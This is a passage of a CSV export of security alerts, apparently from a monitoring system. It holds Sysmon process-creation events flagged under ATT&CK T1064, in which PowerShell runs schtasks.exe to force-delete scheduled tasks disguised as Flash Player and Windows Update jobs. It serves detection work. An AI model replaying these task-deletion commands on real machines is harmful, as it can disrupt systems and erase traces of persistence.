System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN FlashPlayer2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.196",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.726 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-001032d31900} +ProcessId: 3932 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN FlashPlayer1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.732158700Z"",""eventRecordID"":""2224"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.726\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-001032d31900}\r\nProcessId: 3932\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.726"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-001032d31900}"",""processId"":""3932"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN FlashPlayer1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.181",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.698 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-0010a3d11900} +ProcessId: 6940 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN AdobeFlashPlayer /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN AdobeFlashPlayer /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.700655000Z"",""eventRecordID"":""2223"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.698\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-0010a3d11900}\r\nProcessId: 6940\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN AdobeFlashPlayer /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.698"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-0010a3d11900}"",""processId"":""6940"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN AdobeFlashPlayer /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.165",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.675 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-001013d01900} +ProcessId: 6228 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsUpdate3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.677802100Z"",""eventRecordID"":""2222"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.675\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-001013d01900}\r\nProcessId: 6228\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.675"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-001013d01900}"",""processId"":""6228"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsUpdate3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.118",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.642 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-001069ce1900} +ProcessId: 6732 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsUpdate2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.647779400Z"",""eventRecordID"":""2221"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.642\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-001069ce1900}\r\nProcessId: 6732\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.642"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-001069ce1900}"",""processId"":""6732"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsUpdate2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.088",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.605 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-0010d8cc1900} +ProcessId: 4016 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsUpdate1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.608370600Z"",""eventRecordID"":""2220"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.605\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-0010d8cc1900}\r\nProcessId: 4016\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.605"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-0010d8cc1900}"",""processId"":""4016"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsUpdate1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.074",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.580 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-001047cb1900} +ProcessId: 6840 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update_windows /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update_windows /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.587257100Z"",""eventRecordID"":""2219"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.580\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-001047cb1900}\r\nProcessId: 6840\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update_windows /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.580"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-001047cb1900}"",""processId"":""6840"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update_windows /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 